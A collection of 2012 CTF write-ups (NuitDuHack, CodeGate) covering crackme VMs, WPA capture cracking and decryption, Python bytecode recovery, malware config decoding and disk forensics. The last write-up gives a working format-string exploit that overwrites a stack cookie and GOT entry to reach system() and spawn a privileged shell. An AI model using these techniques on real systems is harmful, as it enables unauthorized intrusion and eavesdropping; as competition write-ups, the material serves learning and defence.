0x83a5: inc r7
0x83a7: inc r6
0x83a9: mov r0, [r7]
0x83ad: mov r1, [r6]
0x83b1: xor r0, r1
0x83b5: cmpb r0, #6e   <--- 7
0x83b9: jz 0x0005 //83c1
0x83bc: call 0xff14 //82d4
0x83c0: end
0x83c1: inc r7
0x83c3: inc r6
0x83c5: mov r0, [r7]
0x83c9: mov r1, [r6]
0x83cd: xor r0, r1
0x83d1: cmpb r0, #5e   <--- 8
0x83d5: jz 0x0005 //83dd

Here two strings are xored and the result is checked with a hardcoded string. Let’s see them:

[Console]#> info regs
[r0]: 0074	[r4]: 0000
[r1]: 0002	[r5]: 0000
[r2]: 7fda	[r6]: 840d
[r3]: 001f	[r7]: 7fda
 
[bp]: 7ffa	[zf]: 0001
[sp]: 7fd8	[af]: 0000
[pc]: 8309	[bf]: 0000
[Console]#> x/x 840d:10
0x840d: 02 05 03 07 08 06 01 09 53 63 69 74 65 65 6b 20 
[Console]#> x/x 7fda:10
0x7fda: 74 65 73 74 74 65 73 74 0a 00 00 00 00 00 00 00
        t  e  s  t  t  e  s  t  \n

So, the key is

"\x02\x05\x03\x07\x08\x06\x01\x09"
xor
"\x78\x44\x73\x6b\x61\x3e\x6e\x5e"
---
"zApli8oW"

Connect to the server:

$ nc sci.nuitduhack.com 4001
Sciteek protected storage #1
Enter your password: zApli8oW
<PSP version="1.99">
<MOTD>
[CDATA[
Welcome on SciPad Protected Storage.
 
The most secure storage designed by Sciteek. This storage protocol
allows our users to share files in the cloud, in a dual way.
 
This daemon has been optimized for SciPad v1, running SciOS 16bits
with our brand new processor.
]]>
MOTD>
<FLAG>
ea1670464251ea3b65afd624d9b17cd7
FLAG>
<ERROR>
An unexpected error occured: PSP-UNK-ERR-001> application closed.
ERROR>
PSP>

The flag is: ea1670464251ea3b65afd624d9b17cd7

NuitDuHack 2012 Prequals – sciteekadm.cap

hellman — Sun, 25 Mar 2012 23:00:15 +0000

Hopefully, we succeeded to spy some wireless communications around Sciteek
building, our technical staff has attached the capture file, will you be able
to exploit it? We hope that some valuable files were exchanged during the
capture.
Please entitle your reply “captured file”, as usual.

By the way, your account has been credited with $1000.

Summary: WPA traffic decrypting

Here we have a pcap file with 802.11 (wireless) traffic dump. Seems it’s encrypted, let’s try aircrack:

$ aircrack-ng sciteekadm.cap -w 500-worst-passwords.txt 
Opening sciteekadm.cap
Read 345 packets.
 
   #  BSSID              ESSID                     Encryption
 
   1  40:FC:89:E0:FF:D3  Sciteek-adm               WPA (1 handshake)
 
Choosing first network as target.
 
Opening sciteekadm.cap
Reading packets, please wait...
 
                                 Aircrack-ng 1.1
 
 
                   [00:00:00] 4 keys tested (300.98 k/s)
 
 
                           KEY FOUND! [ 12345678 ]

Password found! But sadly, wireshark can’t decrypt it, because EAPOL packets are corrupted/missing.
But there is a nice tool called airdecap-ng (thx to @kyprizel):

$ airdecap-ng -p 12345678 sciteekadm.cap -e Sciteek-adm
Total number of packets read           345
Total number of WEP data packets         0
Total number of WPA data packets        55
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets        41
$ wireshark sciteekadm-dec.cap

Now we can simply extract a file from tcp session:

The flag: 7e4ef92d1472fa1a2d41b2d3c1d2b77a

NuitDuHack 2012 Prequals – executable2.ndh

hellman — Sun, 25 Mar 2012 23:00:07 +0000

Our anonymous guy managed to get access to another
bunch of files. We also need to get
as much information as possible about the file itself. If you succeed, you will
be rewarded with $2500 for the ndh file.

executable2.ndh
NDH Virtual Machine

Summary: VM in the NDH VM, crackme

This crackme is harder than the first one – it has another simple VM embedded.

[Console]#> bp 0x81e8
Breakpoint set in 0x81e8
[Console]#> run
...
[BreakPoint 1 - 0x81e8]
0x81e8 > syscall (r0 = 0x0003 - read)
test
[SYSCALL output]: 5
0x81e9 > ret
0x8622 > pop r2
0x8624 > pop r1
0x8626 > ret
0x8655 > call 0xfed8
0x8531 > push r2

The inner VM code is located starting at 0x000a, right after the user’s 9-byteinput and :

[Console]#> x/x 0:80
0x0000: 74 65 73 74 0a 00 00 00 00 0a 0a 06 06 00 00 0b 
0x0010: 02 07 4d 06 00 07 02 07 78 07 00 07 09 02 02 07 
0x0020: 61 06 01 07 02 07 02 07 01 07 09 02 02 07 72 06 
0x0030: 02 07 02 07 43 07 02 07 09 02 02 07 31 06 03 07 
0x0040: 02 07 45 07 03 07 09 02 02 07 30 06 04 07 02 07 
0x0050: 03 07 04 07 09 02 02 07 4c 06 05 07 02 07 7f 07 
0x0060: 05 07 09 02 02 07 64 06 06 07 02 07 0f 07 06 07 
0x0070: 09 02 02 00 01 0b 00 00 00 00 00 00 00 00 00 00

The opcode switch is located at 0×8531. Disassembler has a mistake here, so let’s disassemble from 0×8532:
notice: I patched a disassembler to show call’s absolute addresses; though due to disasm fails we need to increment the addresses sometimes

[Console]#> dis 8532:100
0x8532: pop r2
0x8534: call 0xfdf9 //8331
0x8538: cmpb r0, #0b
0x853c: jnz 0x0003 //8542
0x853f: jmpl 0x008f //85d1
0x8542: cmpb r0, #01
0x8546: jnz 0x0007 //8550
0x8549: call 0xfeec //8439
0x854d: jmpl 0xffe4 //8534
0x8550: cmpb r0, #02
0x8554: jnz 0x0007 //855e
0x8557: call 0xff0e //8469
0x855b: jmpl 0xffd6 //8534
0x855e: cmpb r0, #03
0x8562: jnz 0x0007 //856c
0x8565: call 0xfe7c //83e5
0x8569: jmpl 0xffc8 //8534
0x856c: cmpb r0, #04
0x8570: jnz 0x0007 //857a
0x8573: call 0xfe98 //840f
0x8577: jmpl 0xffba //8534
...

There are 11 opcodes: from 01 up to 11. Let’s learn opcode #1:

0x843c: push r1
0x8440: pop r2
0x8442: call 0xfeeb //8331
0x8446: mov r1, r0
0x844a: call 0xfee3 //8331
0x844e: call 0xfeb9 //830b
0x8452: mov r2, r0
0x8456: mov r0, r1
0x845a: mov r1, r2
0x845e: call 0xfebc //831e
0x8462: pop r2
0x8464: pop r1
0x8466: pop r0
0x8468: ret

It contains calls to three functions.

func_8331 checks a code pointer at [0x0009], gets next byte and increases the pointer:

[Console]#> dis 8331:20
0x8331: push r1
0x8335: pop r2
0x8337: movl r0, #0x0009
0x833c: mov r1, [r0]
0x8340: mov r2, [r1]
0x8344: inc r1
0x8346: mov [r0], r1
0x834a: mov r0, r2
0x834e: pop r2
0x8350: pop r1

func_830b gets byte by address: [r0]

[Console]#> dis 830c:20
0x830c: pop r1
0x830e: movl r1, #0x0000
0x8313: add r1, r0
0x8317: mov r0, [r1]
0x831b: pop r1
0x831d: ret

func_831e stores a byte: [r0] = r1

[Console]#> dis 831f:20
0x831f: pop r2
0x8321: movl r2, #0x0000
0x8326: add r2, r0
0x832a: mov [r2], r1
0x832e: pop r2
0x8330: ret

Now we can guess what opcode #1 is doing:

0x843c: push r1
0x8440: pop r2
0x8442: call 0xfeeb //8331 get next byte (operand 1)
0x8446: mov r1, r0
0x844a: call 0xfee3 //8331 get next byte (operand 2)
0x844e: call 0xfeb9 //830b load [op2]
0x8452: mov r2, r0
0x8456: mov r0, r1
0x845a: mov r1, r2
0x845e: call 0xfebc //831e store [op1] = [op2]
0x8462: pop r2
0x8464: pop r1
0x8466: pop r0
0x8468: ret

01 xx yy -> [xx] = [yy]

And so on, after analyzing all the opcodes, we can write a disassembler:

code = """
	02  07 4d 06 00 07 02 07 78 07 00 07 09 02 02 07 
	61  06 01 07 02 07 02 07 01 07 09 02 02 07 72 06 
	02  07 02 07 43 07 02 07 09 02 02 07 31 06 03 07 
	02  07 45 07 03 07 09 02 02 07 30 06 04 07 02 07 
	03  07 04 07 09 02 02 07 4c 06 05 07 02 07 7f 07 
	05  07 09 02 02 07 64 06 06 07 02 07 0f 07 06 07
"""
code = map(lambda s: int(s, 16), code.strip().split())
 
ip = 0
while ip < len(code):
	opcode = code[ip]
	op1, op2 = code[ip+1:ip+3]
	print ip,":", "%02x %02x %02x:\t" % (opcode, op1, op2),
 
	if opcode == 1:
		print "[%2x] = [%2x]" % (op1, op2)
		ip += 2
	if opcode == 2:
		print "[%2x] = %2x" % (op1, op2)
		ip += 2
	if opcode == 3:
		print "inc [%2x]" % op1
		ip += 1
	if opcode == 4:
		print "dec [%2x]" % op1
		ip += 1
	if opcode == 5:
		print "[%2x] = [%2x] + [%2x]" % (op1, op1, op2)
		ip += 2
	if opcode == 6:
		print "[%2x] = [%2x] ^ [%2x]" % (op1, op1, op2)
		ip += 2
	if opcode == 7:
		print "[%2x] == [%2x]" % (op1, op2)
		ip += 2
	if opcode == 8:
		print "je %2x" % (op1)
		ip += 1
	if opcode == 9:
		print "jne %2x" % (op1)
		ip += 1
	ip += 1

Result:

 
$ py dis.py 
0 : 02 07 4d:	[ 7] = 4d
3 : 06 00 07:	[ 0] = [ 0] ^ [ 7]
6 : 02 07 78:	[ 7] = 78
9 : 07 00 07:	[ 0] == [ 7]
12 : 09 02 02:	jne  2
14 : 02 07 61:	[ 7] = 61
17 : 06 01 07:	[ 1] = [ 1] ^ [ 7]
20 : 02 07 02:	[ 7] =  2
23 : 07 01 07:	[ 1] == [ 7]
26 : 09 02 02:	jne  2
28 : 02 07 72:	[ 7] = 72
31 : 06 02 07:	[ 2] = [ 2] ^ [ 7]
34 : 02 07 43:	[ 7] = 43
37 : 07 02 07:	[ 2] == [ 7]
40 : 09 02 02:	jne  2
42 : 02 07 31:	[ 7] = 31
45 : 06 03 07:	[ 3] = [ 3] ^ [ 7]
48 : 02 07 45:	[ 7] = 45
51 : 07 03 07:	[ 3] == [ 7]
54 : 09 02 02:	jne  2
56 : 02 07 30:	[ 7] = 30
59 : 06 04 07:	[ 4] = [ 4] ^ [ 7]
62 : 02 07 03:	[ 7] =  3
65 : 07 04 07:	[ 4] == [ 7]
68 : 09 02 02:	jne  2
70 : 02 07 4c:	[ 7] = 4c
73 : 06 05 07:	[ 5] = [ 5] ^ [ 7]
76 : 02 07 7f:	[ 7] = 7f
79 : 07 05 07:	[ 5] == [ 7]
82 : 09 02 02:	jne  2
84 : 02 07 64:	[ 7] = 64
87 : 06 06 07:	[ 6] = [ 6] ^ [ 7]
90 : 02 07 0f:	[ 7] =  f
93 : 07 06 07:	[ 6] == [ 7]

Hmm it's again just a xor check! Do all ctf-vm creators know only xor? ;)

$ xor -h 4d617231304c64 -h 78024345037f0f
5c1t33k
$ nc sci.nuitduhack.com 4002
Please enter Sciteek admin password: 5c1t33k
...
<<< a source for 4004 here >>>
...

Challenge solved!

CodeGate 2012 Quals – Binary 500

zyx2145 — Wed, 29 Feb 2012 15:21:50 +0000

Seeing that it is not all.

Down

Summary: VM analysis, python decompiling

First of all thanks to snk for help in preparing this writeup.

Also, thanks to snk, blackzert, pzbitskiy and everybody who helped to solve this task!

There are two files. First file is vm2x.exe which is PE x86. Second file is vm2x.dat which is script for immunity debugger. At first glimpse, vm2x.exe looks like a normal VC executable file with library function and so on. But after more scrupulous analysis it becomes obvious that all functional is hided in VM. So, it seems to be easy firstly analyze python script for immunity debugger. Let’s look inside the file:

import marshal, imp
if imp.get_magic() != '\x03\xf3\r\n':
    raise ImportError('Wrong!!')
__code = marshal.loads(“...”)
del marshal, imp
exec __code
del __code

Okey, script required Python2.7. It deserializes and executes python object. Try to disasm __code

$python2.7
>>> import marshal,dis
>>> __code = marshal.loads(“...”)
>>> __code.co_consts
(-1, None, code, code)
>>> __code.co_names ('immlib', 'toString', 'main')
>>> dis.dis(__code)
1 0 LOAD_CONST 0 (-1)
3 LOAD_CONST 1 (None)
6 IMPORT_FROM 0 (immlib)
9 STORE_NAME 0 (immlib)
3 12 LOAD_CONST 2 (code)
15 MAKE_FUNCTION 0
18 STORE_NAME 1 (toString)
12 21 LOAD_CONST 3 (code)
24 MAKE_FUNCTION 0
27 STORE_NAME 2 (main)
30 LOAD_CONST 1 (None)
33 RETURN_VALUE

It imports immlib and defines two function’s “toString” and “main”. Let’s analyze the main function deeper:

>>> main = __code.co_consts[3]
>>> main.co_names
('immlib', 'Debugger', 'readMemory', 'toString', 'getRegs', 'log')
>>> main.co_consts
(None, 4237456, 80, 'EIP', 4273157, 29, 52, 69, 65, 46, 68, 63,
'Nice work, Key1 : "', '"', 'But, Find Next Key!', 4278021, 2, 0, 61,
'Nice work, Key2 : "', 'Input Key : Key1 + Key2', 'Nothing found ..')

It executes function readMemory from 0x40a890 to variable b. which constructs two strings from b like this:

 20          70 LOAD_FAST                3 (b)
             73 LOAD_CONST               5 (29)
             76 BINARY_SUBSCR
             77 LOAD_FAST                3 (b)
             80 LOAD_CONST               6 (52)
             83 BINARY_SUBSCR
             84 BINARY_ADD
             85 LOAD_FAST                3 (b)
             88 LOAD_CONST               7 (69)
             91 BINARY_SUBSCR
             92 BINARY_ADD
             93 LOAD_FAST                3 (b)
             96 LOAD_CONST               6 (52)
             99 BINARY_SUBSCR
            100 BINARY_ADD
            101 LOAD_FAST                3 (b)
            104 LOAD_CONST               8 (65)
            107 BINARY_SUBSCR
            108 BINARY_ADD
            109 LOAD_FAST                3 (b)
            112 LOAD_CONST               9 (46)
            115 BINARY_SUBSCR
            116 BINARY_ADD
            117 LOAD_FAST                3 (b)
            120 LOAD_CONST              10 (68)
            123 BINARY_SUBSCR
            124 BINARY_ADD
            125 LOAD_FAST                3 (b)
            128 LOAD_CONST              11 (63)
            131 BINARY_SUBSCR
            132 BINARY_ADD
            133 STORE_FAST               5 (str1)

After decompiling we had:

import immlib
 
def toString(s):
 t = ''
 for i in range(len(s)):
   if(s[i]==0):
     break
   t += s[i]
 return t
 
def main(args):
 imm = immlib.Debugger()
 a = imm.readMemory(0x40a890,80)
 b = toString(a)
 
 regs = imm.getRegs()
 if (regs['EIP'] == 0x413405):
    str1 = 'b[29]+b[52]+b[69]+b[52]+b[65]+b[46]+b[68]+b[63]'
    imm.log('Nice work, Key1 : "' + str1 + '"')
    return 'But, Find Next Key!'
 elif( regs['EIP'] == 0x414705 ):
    str2 = b[46]+b[29]+b[2]+b[69]+b[2]+b[65]+b[46]+b[0]+b[61]
    imm.log('Nice work, Key2 : "' + str2 + '"')
    return 'Input Key : Key1 + Key2'
 
 return 'Nothing found ..'

Data located at 0x40a890:

.rdata:0040A890 a123456789?@abc db '123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq'
.rdata:0040A890                 db 'rstuvwxyz{|}~'

And finished script for getting answere:

b = "123456789:;?@ABCDEFGHIJKLMNOPQ
                        RSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
print b[29]+b[52]+b[69]+b[52]+b[65]+b[46]+b[68]+b[63] +
      b[46]+b[29]+b[2]+b[69]+b[2]+b[65]+b[46]+b[0]+b[61]

So, we tried an answer “Never_up_N3vr_1n”, but it didn’t work!

So, we thought it is totally ok because bin500 couldn’t be so easy, and start to analyze vm2x.exe.

After careful analysis we completely understood VM structure. It is a three layers virtual machine.

VM layer 1 -> VM layer 2 -> Payload code

The first layer of Virtual machine is described on scheme.

When program starts it allocates memory blocks for each VM, which contain execute buffer, VM stack, and saved native registers. And start execute VM1. Format for VM instruction the following: First byte xor’ed with second byte and interpreted as length. After ‘len’ byte is decrypted on function 0x0041338B, prototype for it:

void __stdcall decode_buffer(char *buf, int size, int key)

After decryption, check first two byte, if this is 0xFFFF, then it VM instruction, otherwise it native code. We write IDA script for decode VM, if you interested look it there. The logic of the VM to generate executable code in a special buffer and execute one instruction per round. The first layer generate code for second layer, and the second layer generates third code layer which is payload. The generated code looks like:

And the same third layer code executes by one instruction per iteration. For transitions between layers two gateway are used (at 0x04135f8 and 0x04113a7). They look like

and

So general working scheme looks like

In this way, if we want to get payload code we need to trace code from layer 3 when program is executing. For this reason we wrote an IDA script:

import idaapi
import binascii
 
class Xglob:
  def __init__(self):
    self.i = 0
    self.dmp = None
glob = Xglob()
 
class ida_SDbg(idaapi.DBG_Hooks):
   def dbg_bpt(self, tid, ea):
     if( dbg_commands.has_key(ea) ):
       callback = dbg_commands[ea]
       if( callback() == 0 ): idaapi.continue_process()
     return 0
 
def GetMem(ea,size):
  r = ''
  for ea in range(ea,ea+size):
    r += chr(Byte(ea))
  return r
 
def DumpInit():
  glob.dmp = file('bin500_1.dmp','wb')
def Dump(s):
  if(glob.dmp!=None): glob.dmp.write(s);
 
def OnVM2():
   idaapi.refresh_debugger_memory()
   ret = Dword(GetRegValue("ESP"))
   l = idaapi.decode_insn(ret)
   Dump(GetMem(ret,l))
   return 0;
 
dbg_commands = {}
script_dbg = ida_SDbg()
script_dbg.hook()
 
dbg_commands[0x004113AC] = OnVM2
DumpInit()

So, after execution we had all executed code as a binary file. This file we can load to IDA as an additional binary file and create a new segment. After these manipulations we can easily analyze payload code. For example, code which create window looks like:

If we push the “MD5” button the code will look like:

From this code we find out that MD5 is calculated by 9000h bytes from beginning of first section (0×401000). There is a part of md5 calculation code:

When we finish analyzing code we found nothing interesting. There were just usual MD5 calculating, picture drawing and message box functional. We spent a lot of time before somebody found out that the answer is “Never_up_N3v3r_1n”, and that when we had checked this answer first time we just had made misspelling mistake. So, all what we had to do is decompile python script. Guys, is it binary 500, are you kidding? Anyway, the VM was very interesting to analyze and we had a fun time =)

Key: Never_up_N3v3r_1n

CodeGate 2012 Quals – Binary 400

zyx2145 — Tue, 28 Feb 2012 04:11:55 +0000

The Rewolf in Kaspersky

Down

Summary: unpack file, analyze crashdumps, bruteforce

The program is packed x86 PE file. It takes few minutes to unpack file. If you execute the file we see this window

So, input doesn’t work. Also if you press any keystroke the application will crash. I think tt is really wired behavior for program =)

Anyway, after hour which was spent to analyze reason of crashes, the idea came up to my mind. If every keystroke initiates crash then we can’t do anything. It should be at least one keystroke which doesn’t lead to crash. So, the easiest way to find that keystroke is a bruteforce. I wrote small bruteforce autohotkey script with restart application and try every keystroke.

Surprisingly, it worked! After simplifying the script looks like

    Run C:\!work\codegate.exe
    WinWait Codegate 2012
    WinActivate
 
    Send {BS}  
    Send {h}
    Send {a}
    Send {n}
    Send {u}
    Send {l}
    Send {9}
    Send {3}
    Send {shift}
    Send {k}
    Send {e}
    Send {i}
    Send {vk60}
    Send {vk76}

When this script finished to execute, the application looked like

Press “Ok!” and bingo!

Key: WonderFul_lollol_!

CodeGate 2012 Quals – Binary 300

zyx2145 — Mon, 27 Feb 2012 06:20:11 +0000

There are malicious program associated with DDoS zombie.
Calcurate the sum of port numbers used for the attack.
And, how many times does zombie try to attack?

Answer: sum(attack_ports) * attack_count (* : multiplication)

Download : 72C4DAA981E17282B12E6226A1D60162

Summary: unpack, malware analyse

There are two files: bin300.exe and dRcw.ziq.
The zombie.exe is a malware. It looks like a bot which can execute several possible commands. The dRcw.ziq is a temporary file in which consists of encrypted bot’s command.
The bot is packed, but that doesn’t take a lot of time to unpack it. The main bot’s functional is located at address 004011B0
The bot has command:

Execute file (4)

Get User ID (5)

Enumerate registry key (6)

Save command in encrypted file (7) at address 0x004014AD
Ddos with settings from saved file (8) at address 0x00401DE0

So, we reconstructed algorithm from ddos function 0x00401DE0

#include
#include
#define __u64 unsigned long long
#define uint32_t unsigned long
 
int xor_func(unsigned __int8 *a1, unsigned int size, int key)
{
  int result;
  unsigned int i;
  if ( key )
  {
    for ( i = 0; i < size; ++i )
    {
      a1[i] ^= key;
      result = i + 1;
    }
  }
  return result;
}
#pragma pack (push, 1)
struct param
{
    unsigned int xor_key;
    unsigned int time1;
    unsigned int time2;
    char type;
    WORD offset;
    DWORD host;
    DWORD port;
    WORD size;
    unsigned int aaa;
};
#pragma pack (pop)
 
int main(int argc, char* argv[])
{
   FILE* hFile;
   param *lpParameter = 0, *pparam = 0;
   unsigned int sum = 0;
   hFile = fopen("dRcw.ziq", "rb");
   if ( hFile )
   {
      fseek(hFile, 0, 2);
      int Count = ftell(hFile);
      rewind(hFile);
      unsigned char* Memory = (unsigned char*)malloc(Count);
      fread(Memory, 1u, Count, hFile);
      fclose(hFile);
      unsigned char* pmem = (unsigned __int8 *)Memory;
      lpParameter = (param *)((char *)Memory + 13);
      for ( int i = 0; i < *(DWORD *)(pmem + 9); ++i )       {          pparam = lpParameter;          xor_func((unsigned char*)&lpParameter->time1, 21, (int)lpParameter->xor_key);
         if ((lpParameter->time2 - lpParameter->time1) > 0)
	    sum2 += ((lpParameter->time2 - lpParameter->time1)/10000 + 1);
         printf("\n%Host: %08x Port: %08x",lpParameter->host,lpParameter->port);
         sum += (WORD)lpParameter->port;
         xor_func((unsigned char*)&lpParameter->aaa, pparam->size + pparam->offset, (int)lpParameter->xor_key);
	 printf("\n%s",(unsigned char*)lpParameter+25);
	 lpParameter = (param *)((char *)lpParameter + pparam->size + pparam->offset + 25);
       }
   }
   printf("\nKey: %d", sum*8);
   return 0;
}

Key: 45136

CodeGate 2012 Quals Forensic 500 Write-up

vos — Sun, 26 Feb 2012 18:25:53 +0000

This file is Forensic file format which is generally used.
Check the information of imaged DISK, find the GUIDs of every partition.

Answer: strupr((part1_GUID) XOR (part2_GUID) XOR …)

Download : B704361ACF90390C17F6103DF4811E2D

Forensic 500 features EWF format container with EFI GPT partition table.

The container

D:\ctf\cg2012\for500>\TrID\trid.exe B704361ACF90390C17F6103DF4811E2D
 
TrID/32 - File Identifier v2.10 - (C) 2003-11 By M.Pontello
Definitions found:  4604
Analyzing...
 
Collecting data from file: B704361ACF90390C17F6103DF4811E2D
100.0% (.E01) EnCase Forensic Drive Image (3006/2)

If it’s EnCase format, let’s open it with EnCase!
…
Aha, not so easy: EnCase spits out an error and doesn’t open it. We are in to parse it manually.

Download EWF format specification.

EWF file can be presented like this:

struct ewf_file {
    char ewf_magic[8] = "EVF\x09\x0D\x0A\xFF\x00";
 
    uint8_t start_of_fields = 0x01;
    uint16_t seg_number;  /* 0x0001 in the sample */
    uint16_t end_of_fields = 0x0001;
 
    struct ewf_section sections[];
}

EWF section description:

struct ewf_section {
    char section_name[16];  /* first is "header2" in sample */
    uint64_t next_section_offset;  /* 0x0175 */
    uint64_t section_size;  /* 0x0168 */
    char padding[40];
    uint32_t section_adler32;  /* 0xE211037B */
    char section_data[];
}

The sample has 5 sections:

header2, starting at file offset 0x0D, data size 0x011C
Contains zlib compressed text data with container metadata. Decompressable with PHP function gzuncompress
header2 duplicate, starting at file offset 0×0175
header, file offset 0x02DD, data size 0×69
Contains zlip-compressed text metadata, format is similar to header2
volume, file offset 0×0392, data size 0x041C
Contains binary disk volume information, not interesting.
sectors, file offset 0x07FA, data size 0x0FF7BA
Contains actual disk sectors, it’s our target. Sectors are grouped by 128 KB and compressed.

Let’s grab several first kilobytes from sectors section and uncompress them.
Download raw sectors.

GPT partition table lies at disk offset 0×200, so first 128 KB is enough for us.

The partition table

GPT headers specification on Wikipedia.

GPT header structure:

struct gpt {
    char gpt_magic[8] = "EFI PART";
    char revision[4] = "\x00\x00\x01\x00";
 
    uint32_t header_size = 0x5C;
    uint32_t header_crc32;  /* 0x50448816 in the sample */
 
    char padding[4];
 
    uint64_t current_lba = 0x01;
    uint64_t backup_lba;  /* 0x0EE7C2AF in sample */
    uint64_t first_data_lba;  /* 0x22 */
    uint64_t last_data_lba;  /* 0x0EE7C28E */
    GUID disk_guid;  /* {33B483E2-0856-4E73-A8C9-96BC37648169} */
 
    uint64_t part_lba = 0x02;
    uint32_t part_number;  /* 0x80 in sample (?!?) */
    uint32_t part_size = 0x80;
    uint32_t part_crc32;  /* 0xE41AB9FC */
 
    char padding[420];
 
    struct gpt_partition partitions[];
}

GPT partititon entry structure:

struct gpt_partition {
    GUID type_guid;
    GUID partition_guid;
    uint64_t first_lba;
    uint64_t last_lba;
    uint64_t flags;
    wchar_t partition_label[36];
}

Using these structures, 4 partition entries can be found:

GUID 2B8026604DAD0547B9B1BF81BDD2CAC7, label “EFI System Partition”
GUID 9996F83677E0E046A7FCD7206ECE9F1C, label “System”
GUID 69BCD73BDCD8E5489C44FF2A0F26F1CD, label “Recovery HD”
GUID A7CD84F394F63A4EACE7BF40EE99E551, label “Secure”

Xor GUID together to get the flag: 7C678D9E72633A072EEE28CB32A34147

Bonus

For users of awesome 010 Editor, I’ve also written templates that automatically parse EWF and GPT into a nice tree:

Download EWF Template
Download GPT Template

CodeGate 2012 Quals Vuln500 Write-up

vos — Sun, 26 Feb 2012 14:10:30 +0000

1.234.41.7:22

ID : yesMan
PWD : ohyeah123

Download vulnerable binary.

Vuln500 was a hardened format-string vuln with ASLR, NX-stack, no-DTORs, RO .dynamic

The vuln

Simple format-string vulnerability:

yesMan@ubuntu:~$ ./X 'hello %p %p %p %p %p'
hello 0xbfdedea6 0x100 0x804825c 0xb7846b48 0xbfde0002

The obstacles

But it’s not that easy to exploit:

Non-executable stack:

root@bt:~/Desktop# execstack X.bin 
- X.bin

We’ll use ret2libc technique instead of jumping on stack.

ASLR turned on:

Libc ASLR:
yesMan@ubuntu:~$ ldd ./X
        linux-gate.so.1 =>  (0xb78b0000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7750000)
        /lib/ld-linux.so.2 (0xb78b1000)
yesMan@ubuntu:~$ ldd ./X
        linux-gate.so.1 =>  (0xb7769000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7609000)
        /lib/ld-linux.so.2 (0xb776a000)

Stack ASLR:
yesMan@ubuntu:/tmp/v$ gdb -q --args ~/X
Reading symbols from /home/yesMan/X...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048477
(gdb) r
Starting program: /home/yesMan/X

Breakpoint 1, 0x08048477 in main ()
(gdb) p/x $esp
$1 = 0xbfb27aa8
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/yesMan/X

Breakpoint 1, 0x08048477 in main ()
(gdb) p/x $esp
$2 = 0xbfdb3818

Partially circumventable using ulimit -s unlimited:

yesMan@ubuntu:~$ ulimit -s unlimited
yesMan@ubuntu:~$ ldd ./X
        linux-gate.so.1 =>  (0x4001d000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0x40024000)
        /lib/ld-linux.so.2 (0x40000000)
yesMan@ubuntu:~$ ldd ./X
        linux-gate.so.1 =>  (0x4001d000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0x40024000)
        /lib/ld-linux.so.2 (0x40000000)

Non-exploitable DTOR fashion:

Hard-coded _DTOR_END__, and no DTORs present.

Read-only .dynamic section and _fini pointer.
However, GOT is writable at run time.

Taking over the control

With writable GOT we can transfer the execution to any address by overwriting an imported library function address. But, after printf no foreign functions are executed under normal conditions. The only opportunity to exploit GOT overwrite is to corrupt stack canary and get __stack_chk_fail called.

We have two ways to force __stack_chk_fail executed:

Overwrite local STK_COOKIE variable at [ebp - 0x14]
Overwrite saved etalon stack cookie at gs:[0x14]

First way is very unreliable because of stack ASLR. It involves overwriting several addresses at stack with garbage, hoping that we match with current randomized stack address and STK_COOKIE gets overwritten. It’s a way to go if we have a spare 30 minutes for bruteforcing stack ASLR.

Second way is more interesting, because it provides 100% exploit reliability.

Flat Memory Model

When the CPU runs across a segment selector (gs: is one) in flat memory model, it reads LDT to find the segment’s base address, and simply adds up that base and offset specified to get linear memory address to work with.

cs: and ds: (default segments) normally have base of 0×0, so reading from gs:[0x14] is equal to reading from ds:[base_of_GS + 0x14]

To get base of GS I used getting a core dump and then analyzing it with eu-readelf (package elfutils):

yesMan@ubuntu:/tmp/v$ ulimit -c 1024
yesMan@ubuntu:/tmp/v$ cp ~/X ./
yesMan@ubuntu:/tmp/v$ ./X '%n%n%n%n'
Segmentation fault (core dumped)
 
root@bt:~/Desktop# eu-readelf -a core.dump
<...>
  LINUX                 48  386_TLS
    index: 6, base: 0x4017e6c0, limit: 0x000fffff, flags: 0x00000051
    index: 7, base: 0x00000000, limit: 0x00000000, flags: 0x00000028
    index: 8, base: 0x00000000, limit: 0x00000000, flags: 0x00000028

gs: segment base address is 0x4017e6c0, so saved stack cookie resides at 0x4017e6d4.

The exploit

Steps to get a shell:
1. Overwrite saved stack cookie with some trash
2. Overwrite __stack_chk_fail at GOT with address of system@glibc
3. Check what is the argument to system() and give that name to our malicious executable

(gdb) p/x &system
$1 = 0x4005d100

system@glibc is at 0x4005d100

Imported __stack_chk_fail address should be overwritten at 0x0804a010

Addresses for overwriting can be passed to printf via env. We need a script to run the executable with modified environment, that we spray with 3 addresses that we need to overwrite:

#!/bin/sh
env -i "PATH=.:$PATH" "A=`perl -e'print"\xd4\xe6\x17\x40"x5000;print"\x10\xa0\x04\x08"x5000;print"\x12\xa0\x04\x08"x5000;'`" $1 $2 $3 $4 $5 $6 $7 $8 $9

Let’s check our gs: stack cookie overwrite trick:

yesMan@ubuntu:/tmp/v$ ./r ltrace ~/X '%2500$n'
__libc_start_main(0x8048474, 2, 0xbf881f64, 0x8048520, 0x8048510 <unfinished ...>
strncpy(0xbf881d9c, "%2500$n", 256)
printf("%2500$n", 0xbf882533)
__stack_chk_fail(0xbf881d9c, 0xbf882533, 256, 0x804825c, 0x4001fb48
*** stack smashing detected ***: /home/yesMan/X terminated

Works like a charm! We tricked the binary into believing we smashed the stack.
Now we add GOT overwriting:

yesMan@ubuntu:/tmp/v$ ./r ~/X '%2500$n%53504d%7500$hn%28421d%12500$hn' 1>/dev/null
sh: %2500%53504d%7500%28421d%12500: not found

Great! system() gets executed, and sh conveniently tells us what binary it is missing. Let’s give it what it wants ;-)

yesMan@ubuntu:/tmp/v$ cat > %2500%53504d%7500%28421d%12500
#!/bin/sh
bash -p
yesMan@ubuntu:/tmp/v$ chmod +x %2500%53504d%7500%28421d%12500
yesMan@ubuntu:/tmp/v$ ./r ~/X '%2500$n%53504d%7500$hn%28421d%12500$hn' 1>/dev/null
bash-4.1$ id >&2
